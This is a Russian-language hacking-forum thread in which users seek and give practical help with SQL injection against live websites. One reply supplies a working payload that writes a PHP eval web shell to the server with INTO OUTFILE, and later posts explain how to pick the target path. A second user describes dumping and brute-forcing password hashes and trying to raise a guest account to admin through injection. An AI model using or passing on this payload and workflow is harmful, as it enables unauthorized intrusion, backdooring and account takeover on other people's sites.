ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Тупой вопрос. Как с помощью скули залить шелл?
Или слить двиг?

2 Arigona поищи на форуме. есть куча флуда на енту тему да и тема есть отдельная

union+select+1,'<?php eval($_GET[‘cmd’]) ?>',3 INTO OUTFILE 'путь/shell.php'--

путь/shell.php это путь к шеллу лежащему к примеру на бесплатном хосте, или путь где сохраниться он?

Access denied for user 'a4860939_df'@'localhost' (using password: YES)

Пишет -\

полный путь куда тебе надо залить шелл
например /server/www/public_html/site/images/shell.php
у каждого сайта свой путь по поводу путей опять же поищи на форумe

Arigona Поиск по форуму, вот одна из тем:
https://forum.antichat.ru/threadnav34338-1-10.html

В этой теме , несколько страниц назад, велась та=же беседа на 10 листов,
можешь почитать отсюда посты kevmen'а и ответы на них:
https://forum.antichat.ru/threadnav46016-502-10.html
не нужно её повторять, пожалуйста

У меня такой вопрос нашел SQL injection подобрал столбцы считал из базы хеши и бручу их. А пока брутяться хотел зайти в админку. (подобрал 1 пароль на пользователя с правами гость). Сформировал запрос http://****_id='99999'%20un ion+UPDA TE%20auth%20SET%20us er _type=admin%20WH ERE%20user_id=2
чтобы обновить пользователя с правами гостя на админа (в базе есть права guest и admin ) и зайти в админку но фиг. Запрос выполняется но ничего в базе не изменяет. Что можно сделать, как изменить права?

Ты от гостя пароль подобрал? В админку гостем заходишь? Что за бред? Сделать тут можно только одно - учить FAQ и учить и учить и учить... Ты где-нибудь видел в факе, чтобы народе через инъекцию делал UNION на SELECT и UPDATE? Этого не возможно сделать!